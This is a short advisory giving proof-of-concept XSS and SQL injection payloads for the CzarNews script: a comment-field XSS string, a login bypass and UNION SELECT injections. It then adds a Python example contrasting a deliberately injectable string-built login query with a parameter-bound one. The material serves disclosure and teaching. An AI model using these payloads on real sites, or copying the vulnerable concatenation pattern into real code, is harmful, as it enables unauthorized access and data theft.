PoC/Exploit for XSS and Multiple SQL Injection in CzarNews
Published Proof of Concept code - XSS and Multiple SQL Injection in CzarNews.
- Description: Available
- Solution: Not available - check vendor's website
1. Cross-Site Scripting Example:

URL: http://[host]/news.php?a=1
Post a Comment
Email: ">[XSS]<aaa aaa="

2. SQL Injection Examples:

URL: http://[host]/index.php
Username: ' or 1/*
Password: any

URL: http://[host]/news.php
News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*

URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*
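
The login input and the Email value listed above, handled by a string-built query versus a bound-parameter query and by attribute encoding. This is an added example, not CzarNews code and not part of the original advisory; it assumes Python with an in-memory SQLite database, and the table layout and function names are hypothetical.

```python
import html
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a user table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample row; the password value is a placeholder.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-value')")
    return db

def login_concat(db, username, password):
    """Weak pattern: request values are pasted into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, username, password):
    """Corrected pattern: values are bound as parameters and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def render_email_attr(email):
    """Encode the comment form's Email value before placing it in an attribute."""
    return '<input name="email" value="' + html.escape(email, quote=True) + '">'

if __name__ == "__main__":
    db = make_db()
    user, pw = "' or 1/*", "any"  # login input listed in the advisory
    print("string-built query accepts it:", login_concat(db, user, pw))
    print("bound query accepts it:       ", login_bound(db, user, pw))
    print(render_email_attr('">[XSS]<aaa aaa="'))
```

The same bound-parameter form applies to the News Search field and the `a` parameter of news.php, where the values would be bound into the `LIKE` pattern and the ID comparison respectively.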


